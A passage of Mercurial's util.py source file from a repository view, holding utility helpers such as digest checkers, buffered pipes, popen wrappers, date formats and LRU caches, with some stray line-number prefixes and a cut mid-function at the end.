py3: work around bytes/unicode divergence in parsedate()
Yuya Nishihara
r34358:b76937fa default

# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import calendar
import codecs
import collections
import contextlib
import datetime
import errno
import gc
import hashlib
import imp
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import signal
import socket
import stat
import string
import subprocess
import sys
import tempfile
import textwrap
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    policy,
    pycompat,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
httpserver = pycompat.httpserver
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
urlerr = pycompat.urlerr
urlreq = pycompat.urlreq
xmlrpclib = pycompat.xmlrpclib

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

def isatty(fp):
    try:
        return fp.isatty()
    except AttributeError:
        return False

# glibc determines buffering on first write to stdout - if we replace a
# TTY-destined stdout with a pipe-destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

if pycompat.osname == 'nt':
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass

# Python compatibility

_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)

def safehasattr(thing, attr):
    return getattr(thing, attr, _notset) is not _notset

def bytesinput(fin, fout, *args, **kwargs):
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = sin, sout

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to a standard user, so detect if we are running a test
# and only use python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')

def nouideprecwarn(msg, version, stacklevel=1):
206 206 """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(msg, DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

closefds = pycompat.osname == 'posix'

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
340 340 """True is any data is currently buffered
341 341
342 342 This will be used externally a pre-step for polling IO. If there is
343 343 already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

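# A minimal usage sketch for mmapread (illustrative; 'path' is hypothetical):
#
#     with open(path, 'rb') as fp:
#         data = mmapread(fp)   # memory-mapped, bytes-like view of the file
#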
def popen2(cmd, env=None, newlines=False):
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout

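# A usage sketch for popen2 (illustrative): pipe bytes through a shell
# command and read the transformed output back.
#
#     fin, fout = popen2('tr a-z A-Z')
#     fin.write('hello\n')
#     fin.close()
#     fout.read()   # -> 'HELLO\n'
#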
def popen3(cmd, env=None, newlines=False):
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr

def popen4(cmd, env=None, newlines=False, bufsize=-1):
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p

def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    parts = remod.split('[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

# used by parsedate
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    # without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    # without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

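# A usage sketch for cachefunc (illustrative, not part of the module API):
#
#     @cachefunc
#     def fib(n):
#         return n if n < 2 else fib(n - 1) + fib(n - 2)
#
# Each distinct argument is computed once; repeated calls hit the cache.
#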
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

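# A usage sketch (illustrative): any transactional subclass can be driven as
# a context manager; close() runs on success and release() runs either way,
# aborting if the transaction was never closed:
#
#     with maketransaction() as tr:   # 'maketransaction' is hypothetical
#         dosomething(tr)
#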
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

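# A usage sketch (illustrative): unlike a plain transaction context, an
# InterventionRequired exception closes (commits) the work done so far
# before re-raising, instead of aborting it:
#
#     with acceptintervention(tr):
#         dostep(tr)   # 'dostep' is hypothetical and may raise
#                      # error.InterventionRequired
#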
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
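
    A small usage example (eviction follows least recent use):

    >>> d = lrucachedict(2)
    >>> d[b'a'] = 1
    >>> d[b'b'] = 2
    >>> d[b'a']
    1
    >>> d[b'c'] = 3
    >>> b'b' in d
    False
    >>> b'a' in d
    True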
743 743 """
744 744 def __init__(self, max):
745 745 self._cache = {}
746 746
747 747 self._head = head = _lrucachenode()
748 748 head.prev = head
749 749 head.next = head
750 750 self._size = 1
751 751 self._capacity = max
752 752
753 753 def __len__(self):
754 754 return len(self._cache)
755 755
756 756 def __contains__(self, k):
757 757 return k in self._cache
758 758
759 759 def __iter__(self):
760 760 # We don't have to iterate in cache order, but why not.
761 761 n = self._head
762 762 for i in range(len(self._cache)):
763 763 yield n.key
764 764 n = n.next
765 765
766 766 def __getitem__(self, k):
767 767 node = self._cache[k]
768 768 self._movetohead(node)
769 769 return node.value
770 770
771 771 def __setitem__(self, k, v):
772 772 node = self._cache.get(k)
773 773 # Replace existing value and mark as newest.
774 774 if node is not None:
775 775 node.value = v
776 776 self._movetohead(node)
777 777 return
778 778
779 779 if self._size < self._capacity:
780 780 node = self._addcapacity()
781 781 else:
782 782 # Grab the last/oldest item.
783 783 node = self._head.prev
784 784
785 785 # At capacity. Kill the old entry.
786 786 if node.key is not _notset:
787 787 del self._cache[node.key]
788 788
789 789 node.key = k
790 790 node.value = v
791 791 self._cache[k] = node
792 792 # And mark it as newest entry. No need to adjust order since it
793 793 # is already self._head.prev.
794 794 self._head = node
795 795
796 796 def __delitem__(self, k):
797 797 node = self._cache.pop(k)
798 798 node.markempty()
799 799
800 800 # Temporarily mark as newest item before re-adjusting head to make
801 801 # this node the oldest item.
802 802 self._movetohead(node)
803 803 self._head = node.next
804 804
805 805 # Additional dict methods.
806 806
807 807 def get(self, k, default=None):
808 808 try:
809 809 return self._cache[k].value
810 810 except KeyError:
811 811 return default
812 812
813 813 def clear(self):
814 814 n = self._head
815 815 while n.key is not _notset:
816 816 n.markempty()
817 817 n = n.next
818 818
819 819 self._cache.clear()
820 820
821 821 def copy(self):
822 822 result = lrucachedict(self._capacity)
823 823 n = self._head.prev
824 824 # Iterate in oldest-to-newest order, so the copy has the right ordering
825 825 for i in range(len(self._cache)):
826 826 result[n.key] = n.value
827 827 n = n.prev
828 828 return result
829 829
830 830 def _movetohead(self, node):
831 831 """Mark a node as the newest, making it the new head.
832 832
833 833 When a node is accessed, it becomes the freshest entry in the LRU
834 834 list, which is denoted by self._head.
835 835
836 836 Visually, let's make ``N`` the new head node (* denotes head):
837 837
838 838 previous/oldest <-> head <-> next/next newest
839 839
840 840 ----<->--- A* ---<->-----
841 841 | |
842 842 E <-> D <-> N <-> C <-> B
843 843
844 844 To:
845 845
846 846 ----<->--- N* ---<->-----
847 847 | |
848 848 E <-> D <-> C <-> B <-> A
849 849
850 850 This requires the following moves:
851 851
852 852 C.next = D (node.prev.next = node.next)
853 853 D.prev = C (node.next.prev = node.prev)
854 854 E.next = N (head.prev.next = node)
855 855 N.prev = E (node.prev = head.prev)
856 856 N.next = A (node.next = head)
857 857 A.prev = N (head.prev = node)
858 858 """
859 859 head = self._head
860 860 # C.next = D
861 861 node.prev.next = node.next
862 862 # D.prev = C
863 863 node.next.prev = node.prev
864 864 # N.prev = E
865 865 node.prev = head.prev
866 866 # N.next = A
867 867 # It is tempting to do just "head" here, however if node is
868 868 # adjacent to head, this will do bad things.
869 869 node.next = head.prev.next
870 870 # E.next = N
871 871 node.next.prev = node
872 872 # A.prev = N
873 873 node.prev.next = node
874 874
875 875 self._head = node
876 876
877 877 def _addcapacity(self):
878 878 """Add a node to the circular linked list.
879 879
880 880 The new node is inserted before the head node.
881 881 """
882 882 head = self._head
883 883 node = _lrucachenode()
884 884 head.prev.next = node
885 885 node.prev = head.prev
886 886 node.next = head
887 887 head.prev = node
888 888 self._size += 1
889 889 return node
890 890
891 891 def lrucachefunc(func):
892 892 '''cache most recent results of function calls'''
893 893 cache = {}
894 894 order = collections.deque()
895 895 if func.__code__.co_argcount == 1:
896 896 def f(arg):
897 897 if arg not in cache:
898 898 if len(cache) > 20:
899 899 del cache[order.popleft()]
900 900 cache[arg] = func(arg)
901 901 else:
902 902 order.remove(arg)
903 903 order.append(arg)
904 904 return cache[arg]
905 905 else:
906 906 def f(*args):
907 907 if args not in cache:
908 908 if len(cache) > 20:
909 909 del cache[order.popleft()]
910 910 cache[args] = func(*args)
911 911 else:
912 912 order.remove(args)
913 913 order.append(args)
914 914 return cache[args]
915 915
916 916 return f
917 917
918 918 class propertycache(object):
919 919 def __init__(self, func):
920 920 self.func = func
921 921 self.name = func.__name__
922 922 def __get__(self, obj, type=None):
923 923 result = self.func(obj)
924 924 self.cachevalue(obj, result)
925 925 return result
926 926
927 927 def cachevalue(self, obj, value):
928 928 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
929 929 obj.__dict__[self.name] = value
930 930
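# A usage sketch for propertycache (illustrative; the class and
# 'computevalue' are hypothetical). The first access runs the function and
# stores the result in the instance __dict__, which shadows the descriptor
# on later accesses:
#
#     class thing(object):
#         @propertycache
#         def expensive(self):
#             return computevalue(self)
#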
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout

def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass

filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}

def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)

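# A usage sketch (illustrative): the 'pipe:' prefix streams through stdin and
# stdout, while 'tempfile:' substitutes INFILE/OUTFILE in the command line.
#
#     filter('text\n', 'pipe: tr a-z A-Z')
#     filter('text\n', 'tempfile: tr a-z A-Z < INFILE > OUTFILE')
#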
def binary(s):
    """return true if a string is binary data"""
    return bool(s and '\0' in s)

def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

Abort = error.Abort

def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
1039 1039 """
1040 1040 def wrapper(*args, **kwargs):
1041 1041 gcenabled = gc.isenabled()
1042 1042 gc.disable()
1043 1043 try:
1044 1044 return func(*args, **kwargs)
1045 1045 finally:
1046 1046 if gcenabled:
1047 1047 gc.enable()
1048 1048 return wrapper
1049 1049
1050 1050 if pycompat.ispypy:
1051 1051 # PyPy runs slower with gc disabled
1052 1052 nogc = lambda x: x
1053 1053
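# A usage sketch for nogc (illustrative; 'parseentries' is hypothetical):
#
#     @nogc
#     def readbigindex(data):
#         # builds a huge dict without intermediate GC passes
#         return dict(parseentries(data))
#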
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze

# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable

def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path

def _isstdout(f):
    fileno = getattr(f, 'fileno', None)
    return fileno and fileno() == sys.__stdout__.fileno()

def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env

def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
